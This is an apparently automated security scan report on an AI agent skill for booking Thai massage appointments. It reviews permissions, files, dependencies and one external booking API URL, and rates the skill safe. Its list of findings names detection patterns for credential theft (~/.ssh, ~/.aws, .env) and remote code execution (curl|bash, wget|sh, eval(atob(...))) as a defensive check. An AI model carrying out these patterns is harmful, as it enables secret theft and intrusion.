蘭泰式按摩预约安全扫描报告 — 可信 | ClawSafe

5 /100

蘭泰式按摩预约

提供蘭泰式按摩的预约服务，包括门店查询、服务查询和创建预约功能

A legitimate Thai massage (蘭泰式按摩) booking skill with clean, straightforward code. No shell execution, no credential access, no sensitive path traversal, and no data exfiltration. The only external network call is a documented POST to the booking API.

技能名称蘭泰式按摩预约

分析耗时32.2s

引擎pi

✓

可以安装

This skill is safe to use. No action required.

资源类型	声明权限	推断权限	状态	证据
文件系统	`READ`	`READ`	✓ 一致	index.js:5 — fs.readFileSync reads org_store.json and prod_service.json
网络访问	`READ`	`WRITE`	✓ 一致	index.js:96 — fetch POST to https://open.lannlife.com/mcp/book/create
命令执行	`NONE`	`NONE`	—	No child_process, exec, spawn, or eval calls found
环境变量	`NONE`	`NONE`	—	No os.environ or process.env access found
技能调用	`NONE`	`NONE`	—	No recursive skill invocation
剪贴板	`NONE`	`NONE`	—	No clipboard access
浏览器	`NONE`	`NONE`	—	No browser automation
数据库	`NONE`	`NONE`	—	No database access

1 项发现

🔗

中危外部 URL 外部 URL

https://open.lannlife.com/mcp/book/create

SKILL.md:49

目录结构

6 文件 · 44.6 KB · 1266 行

JSON 3f · 574L JavaScript 2f · 525L Markdown 1f · 167L

├─ 📋 _meta.json JSON 4L · 102 B

├─ 📜 index.js JavaScript 437L · 12.0 KB

├─ 📋 org_store.json JSON 457L · 16.8 KB

├─ 📋 prod_service.json JSON 113L · 6.8 KB

├─ 📝 SKILL.md Markdown 167L · 5.8 KB

└─ 📜 test.js JavaScript 88L · 3.1 KB

依赖分析 3 项

包名	版本	来源	已知漏洞	备注
`fs`	`built-in`	Node.js core	否	Only reads static JSON files
`path`	`built-in`	Node.js core	否	Path resolution only
`fetch`	`built-in`	Node.js / Web API	否	Standard HTTP POST to documented endpoint

安全亮点

✓ No shell execution (child_process, exec, spawn, eval) — code is purely JavaScript logic

✓ No credential harvesting — no access to ~/.ssh, ~/.aws, .env, or environment variables

✓ No sensitive path traversal — only reads two specific local JSON files in __dirname

✓ No base64/decode tricks — no obfuscated code or hidden payloads

✓ No remote code execution patterns — curl|bash, wget|sh, or eval(atob(...)) not present

✓ No data exfiltration — only POSTs booking data (mobile, store, service) to one documented API endpoint

✓ Input validation is comprehensive: phone number format, people count (1-20), ISO 8601 time, required string checks

✓ Smart matching provides safety against typosquatting of store/service names

✓ Dependencies: only Node.js built-in modules (fs, path) — no external npm packages with untracked vulnerabilities

✓ Full test suite in test.js for all major functions

✓ SKILL.md accurately documents all three capabilities and the external API endpoint